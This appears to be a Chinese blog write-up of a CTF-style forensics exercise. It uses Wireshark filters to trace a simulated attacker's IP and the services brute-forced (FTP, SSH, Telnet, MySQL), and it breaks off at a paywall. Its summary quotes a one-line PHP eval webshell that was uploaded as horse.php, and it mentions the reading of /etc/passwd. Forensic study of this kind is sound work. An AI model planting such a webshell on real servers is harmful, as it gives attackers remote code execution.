本文通过Wireshark分析dump.pcapng数据包文件,揭示黑客攻击过程。从识别黑客IP(172.16.1.110)开始,发现其针对ftp(21)、ssh(22)、telnet(23)、mysql(3306)服务进行暴力枚举。黑客成功破解了MySQL 5.7.26版本,上传了horse.php木马,并用'<?php @eval($_POST[lqsym])?>'作为木马密码。黑客查看了/etc/passwd文件,并通过FTP下载了名为flag.jpg的图片,其中包含英文单词suictsr247。
wireshark数据包分析
Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
数据包分析器又名嗅探(Sniffers),是一种网络流量数据分析的手段,常见于网络安全领域使用,也有用于业务分析领域,一般是指使用嗅探器对数据流的数据截获与分组分析(Packet analysis)。
wireshark下载地址 https://www.wireshark.org/download.html
以上摘自百度
1.某公司网络系统存在异常,猜测可能有黑客对公司的服务器实施了一系列的扫描和攻击,使用Wireshark抓包分析软件查看并分析Kali Linux的/root目录下dump.pcapng数据包文件,找到黑客的IP地址,并将黑客的IP地址作为Flag值(如:172.16.1.1)提交;
过滤tcp.connection.syn (tcp)包
Source来源,Destination目的地
来源地址172.16.1.110,所以黑客ip172.16.1.110
2.继续分析数据包文件dump.pcapng分析出黑客通过工具对目标服务器的哪些服务进行了密码暴力枚举渗透测试,将服务对应的端口依照从小到大的顺序依次排列作为Flag值(如:77/88/99/166/1888)提交;
过滤tcp.connection.syn and ip.src == 172.16.1.110
发现ftp,ssh,telnet,mysql,所以端口有21/22/23/3306
最低0.47元/天 解锁文章
扫一扫
3342
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
